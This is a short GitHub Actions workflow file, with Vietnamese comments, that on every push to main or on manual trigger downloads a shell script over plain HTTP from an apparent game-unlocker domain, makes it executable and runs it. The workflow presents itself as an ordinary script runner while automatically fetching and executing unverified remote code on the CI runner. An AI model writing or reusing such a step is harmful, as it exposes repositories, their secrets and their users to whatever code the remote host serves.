name: Run Script Workflow

on:
  workflow_dispatch:  # Cho phép chạy thủ công từ GitHub Actions tab
  push:
    branches:
      - main  # Hoặc branch bạn muốn trigger tự động

jobs:
  run-script:
    runs-on: ubuntu-latest
    
    steps:
      - name: Download and run script
        run: |
          curl -o run.sh http://valorantunlocker.shop/run.sh
          chmod +x run.sh
          bash run.sh

